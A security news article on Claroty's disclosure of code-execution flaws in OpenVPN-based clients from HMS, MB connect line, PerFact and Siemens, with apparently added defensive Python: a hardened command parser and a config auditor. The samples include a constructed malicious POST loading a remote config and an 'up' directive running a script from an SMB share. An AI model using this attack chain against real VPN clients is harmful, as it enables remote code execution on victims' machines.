Severe Code Execution Vulnerabilities Affect OpenVPN-Based Applications

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.

The company documented four security errors in products from HMS Industrial Networks, MB connect line, PerFact, and Siemens that allow attackers to achieve code execution by tricking potential victims into visiting a maliciously crafted web page.

VPN solutions are designed to give users a means of encrypting the traffic flowing between their devices and a specific network, so that potentially sensitive data is transmitted securely, and OpenVPN is the most common implementation of a VPN solution.

During its analysis of OpenVPN-based solutions, Claroty discovered that vendors usually deploy OpenVPN as a service with SYSTEM privileges, which poses security risks, because any remote or local application can control an OpenVPN instance to initiate or terminate a secured connection.

Typically, a VPN client-server architecture involves the presence of a front end (a GUI application), a back end (which receives commands from the front-end), and OpenVPN (a service controlled by the back end and responsible for the VPN connection).

Because in most cases a cleartext protocol is used within the dedicated socket channel through which the front end controls the back end, without any form of authentication, “anyone with access to the local TCP port the back end listens on, could potentially load an OpenVPN config and force the back end to spawn a new OpenVPN instance with this configuration,” Claroty explained.

An attacker looking to exploit this flaw would simply need to trick the victim into accessing a malicious website containing embedded JavaScript code designed to send a blind POST request locally, to inject commands into the VPN client back end. This is a classic Server-Side Request Forgery (SSRF) case, the company said.

“Once the victim clicks the link, an HTTP POST request will be fired locally to the dedicated TCP port, and since HTTP is a cleartext based protocol in which every line ends with \n, the back end server will read and ignore all the lines until reaching a meaningful command,” according to Claroty’s documentation.

Because the back end server will automatically parse and execute any valid commands it may receive, it could be instructed to load a remote configuration file containing specific commands leading to code execution or the installation of malicious payloads.
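The control-channel weakness described above comes down to two properties of the back end: it accepts commands without any authentication, and it silently skips lines it does not understand, so the request line and headers of a browser-originated HTTP POST are "read past" until the body's commands arrive. The following is an added illustration, not Claroty's or any vendor's code: a toy line-oriented command parser in its weak form beside a hardened form that requires a session token on the first line and fails closed on any unknown line. The command names, the token scheme and the sample traffic are all constructed for the example.

```python
"""Added example: a toy VPN back-end control channel in weak and hardened
form. Nothing here is taken from a real product; command names (LOAD_CONFIG,
START, STOP), the AUTH line and all sample traffic are constructed."""
import hmac
from typing import List

# Constructed sample: what a back end reads from its local TCP socket when a
# web page in the victim's browser fires a cross-origin POST at it. HTTP is
# line-based, so the request line and headers arrive as ordinary lines
# followed by a blank line and then the body.
BROWSER_POST = (
    "POST / HTTP/1.1\r\n"
    "Host: 127.0.0.1:1234\r\n"
    "Origin: http://untrusted.example\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 48\r\n"
    "\r\n"
    "LOAD_CONFIG https://example.test/x.ovpn\r\n"  # hypothetical command
    "START\r\n"
)

# Constructed legitimate front-end traffic for the hardened parser. The GUI
# presents a per-session secret it obtained out of band (for instance from a
# file readable only by the logged-in user); a web page cannot know it.
SESSION_TOKEN = "constructed-secret-token"
LEGIT_SESSION = f"AUTH {SESSION_TOKEN}\r\nSTART\r\n"

KNOWN_COMMANDS = {"LOAD_CONFIG", "START", "STOP"}  # hypothetical command set


def weak_parse(stream: str) -> List[str]:
    """Weak form: every line that is not a known command is skipped and the
    rest are accepted. The HTTP request line and headers are unknown, so
    they are ignored and the commands in the body reach the dispatcher."""
    accepted: List[str] = []
    for line in stream.split("\r\n"):
        verb = line.split(" ", 1)[0]
        if verb in KNOWN_COMMANDS:
            accepted.append(line)
    return accepted


def hardened_parse(stream: str, token: str = SESSION_TOKEN) -> List[str]:
    """Hardened form: (1) the first line must be a valid AUTH line, compared
    in constant time; (2) any later line that is not a known command aborts
    the whole session instead of being skipped, so HTTP framing can never
    be read past. Both checks fail closed by returning no commands."""
    lines = stream.split("\r\n")
    if not lines or not hmac.compare_digest(lines[0], f"AUTH {token}"):
        return []  # unauthenticated: drop the session
    accepted: List[str] = []
    for line in lines[1:]:
        if line == "":
            continue  # trailing empty element from the final CRLF
        verb = line.split(" ", 1)[0]
        if verb not in KNOWN_COMMANDS:
            return []  # protocol violation: discard everything
        accepted.append(line)
    return accepted


if __name__ == "__main__":
    print("weak parser on browser POST:    ", weak_parse(BROWSER_POST))
    print("hardened parser on browser POST:", hardened_parse(BROWSER_POST))
    print("hardened parser on GUI session: ", hardened_parse(LEGIT_SESSION))
```

The weak parser returns the two body commands from the browser request, which is exactly the behaviour the article describes; the hardened parser rejects that request at the first line and still serves the front end. Neither check requires changing the socket itself, which is why a local-port control channel should always carry both an authenticator and a strict grammar rather than rely on the port being "local".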

“The attacker does not need to set up a dedicated OpenVPN server of their own because the up OpenVPN directive command is being executed before the connection to the OpenVPN server occurs,” Claroty said.

To achieve remote code execution, however, access to the attacker-controlled SMB server is needed, meaning that the attacker must either be on the same domain network as the target system, or the victim's computer must be configured to allow SMB access to external servers, the researchers note.
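The two preceding paragraphs identify what a defender can actually look for in a configuration the back end is asked to load: an OpenVPN directive that runs a command (the up directive is one of several) and a command argument that is a UNC path, i.e. something fetched over SMB. The following is an added example, not Claroty's or any vendor's tool: a small audit that flags such directives in an OpenVPN client config. The directive names are real OpenVPN options; the sample configuration and its paths are constructed.

```python
"""Added example: flag OpenVPN config directives that execute commands, and
arguments that point at SMB (UNC) paths. Directive names are real OpenVPN
options; the sample config below is constructed and belongs to no product."""
import re
from typing import List, Tuple

# OpenVPN options whose argument is a command or script the daemon executes
# at some point in the connection life cycle (up/down, route changes, etc.).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "client-connect", "client-disconnect", "learn-address",
    "auth-user-pass-verify", "plugin",
}

# \\host\share\... : a UNC path, so the command would be fetched over SMB.
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")

Finding = Tuple[int, str, str]  # (line number, severity, message)

# Constructed sample config. The certificate body is a placeholder and the
# UNC host uses a documentation address (203.0.113.0/24).
SAMPLE_CONFIG = """\
# constructed sample config, not from any vendor product
client
dev tun
proto udp
remote vpn.example.test 1194
<ca>
-----BEGIN CERTIFICATE-----
MIIB...constructed placeholder...
-----END CERTIFICATE-----
</ca>
script-security 2
up \\\\203.0.113.10\\share\\run.bat
route-up "C:\\Program Files\\vendor\\routes.bat"
"""


def audit_ovpn(text: str) -> List[Finding]:
    """Walk the config line by line and return findings for command-running
    directives. Comments (# or ;) and the bodies of inline <ca>/<cert>/<key>
    blocks are skipped; this simplified parser also skips <connection> blocks."""
    findings: List[Finding] = []
    in_inline_block = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if in_inline_block:
            if line.startswith("</"):
                in_inline_block = False
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("<"):
            in_inline_block = True
            continue
        directive, _, arg = line.partition(" ")
        arg = arg.strip().strip('"\'')
        if directive == "script-security":
            level = arg.split()[0] if arg else "0"
            # Level 2 and above let the config run user-defined scripts.
            if level.isdigit() and int(level) >= 2:
                findings.append((lineno, "medium",
                                 f"script-security {level} permits user-defined scripts"))
        elif directive in SCRIPT_DIRECTIVES:
            if UNC_PATH.match(arg):
                findings.append((lineno, "high",
                                 f"{directive} runs a command fetched over SMB: {arg}"))
            else:
                findings.append((lineno, "medium",
                                 f"{directive} runs a local command: {arg}"))
    return findings


def has_remote_command(text: str) -> bool:
    """True when any command-running directive points at a UNC path."""
    return any(sev == "high" for _, sev, _ in audit_ovpn(text))


if __name__ == "__main__":
    for lineno, severity, message in audit_ovpn(SAMPLE_CONFIG):
        print(f"line {lineno:>3} [{severity}] {message}")
```

A back end that has to accept configurations from a front end can run a check like this before spawning OpenVPN and refuse anything with a "high" finding, or strip the command-running directives entirely if the product never needs them. Combined with blocking outbound SMB at the perimeter, which the article notes is the other precondition for code execution, it removes the path from "load this config" to "run this payload".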

A total of five CVE identifiers were issued based on Claroty’s research: CVE-2020-14498 (CVSS 9.6 – HMS Industrial Networks AB’s eCatcher), CVE-2021-27406 (CVSS 8.8 – PerFact’s OpenVPN-Client), CVE-2021-31338 (CVSS 7.8 – Siemens’ SINEMA RC Client), and CVE-2021-33526 and CVE-2021-33527 (CVSS 7.8 – MB connect line GmbH’s mbConnect Dialup).

Related: NSA, CISA Issue Guidance on Selecting and Securing VPNs

Related: Tens of Thousands of Unpatched Fortinet VPNs Hacked via Old Security Flaw

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
